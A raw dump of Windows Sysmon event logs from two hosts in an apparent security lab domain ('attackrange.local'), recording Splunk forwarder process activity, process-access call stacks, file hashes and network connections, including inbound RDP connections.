Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976559Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.578{69CF5F33-8868-6151-7E79-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976558Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC1E1E139DA358320BB9D70F64BA152F,SHA256=48CFFCFC0BB5A763149B574090466E8E5FAB0BD42031754C9BFCDDC4919CF7A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976557Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.093{69CF5F33-8867-6151-7D79-00000000FD01}40361076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000976556Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:24.848{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54872-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976588Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.561{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BD9A034440889CFBA9A52FE995E80D0,SHA256=B4F366D6518F86564537C1000FB482FE992665F92C829A2F74360E9735D850A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:29.651{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D744310E0A9CBDA3D61C61B2FA1FDE6,SHA256=5383FE7A855D9F0B43606BA9E17F7DC03024E3226F6BA2C2A805D3FA1F98DF3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976587Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.421{69CF5F33-8869-6151-7F79-00000000FD01}22842512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976586Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.280{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8869-6151-7F79-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976585Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976584Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976583Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976582Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976581Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976580Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976579Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976578Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976577Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976576Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8869-6151-7F79-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976575Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8869-6151-7F79-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976574Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.265{69CF5F33-8869-6151-7F79-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000976573Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.301{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-1905-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976572Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.061{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1918E6E22468987151ED89A3C9EC36A0,SHA256=291E57778BA4870C93EFC56C4A072C0EF47A7B6813DF2925E4A95EDE7180C167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976590Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:30.718{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47E69C0D7047CBA5DFFE5854E01DFCA2,SHA256=DB616D800FB0B793C6E1D58B1149E8AB1DC07F479A3CE9C00FCABBEDF7EF2546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:30.653{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7409ED65FEA419334B283AF6F530B8C,SHA256=CCFFAF21CDA316BF56D1281C1BF3A5E75C875BD8894B68FB18C20426BC923125,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976589Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:30.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C328B99271C7BC78D1DE436456C0013,SHA256=04CA7E49877B4CB835A1274EB3D4945448C624088C4792FA3C004B6F9ED841E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976592Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:31.952{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=192313F5DCDEA2D360289ADA34F9ADFE,SHA256=BB68B5941A2F6FE0BA12BCC7C4458094656D1248DF630381610F5D385B9DD6C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:31.705{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3A21C7336D2B9D952F4D8AB5F4CF5C,SHA256=ECD733E3B773F7FE690D7AA81800A93A82DD5AB11A25AF87DAB733959E9D0E04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976591Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:31.514{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A91E7EA1E27E7D41999A2142372CF2C,SHA256=18F2A437A6C797AE35511C2EF6815D018202E350A730BE93768077AD3451FA1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:32.889{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C45F2923B5DCCC747930EA0A7A904BDD,SHA256=4B2F89959AADF550A085E3253E98B85D83607831EA73BD4286404226F361FF8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976593Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:32.468{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3E02477241288A719D0449B48E01D87A,SHA256=597DC36C7BF84B12502D76EE88A860663C0182F165AB95FE1C7EA423AACA5F74,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:30.589{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56008-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:29.779{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49223-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:32.237{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18B94E058FCB40A8342DFB9C5B9470C7,SHA256=F4AF5195FD399FFF4B2BDCAB4ED6779BEBC5E74629A9B4B1171002D978836CF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:33.904{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EC551DCCA584EAE54FFA9BFD0051C1B,SHA256=14616CF578E4DF327470CEAA3A695A762B619CD46A8383F65C1C4865934EC6F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976595Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:29.830{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59260-false10.0.1.12-8000- 23542300x8000000000000000976594Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:33.014{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F230A809CE5FF6C680822C3DC02AD3A8,SHA256=050E90459D98A6DEEF4858E65DBCE2C7E689AD1A835388C55332E3B1960B2A19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:34.919{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 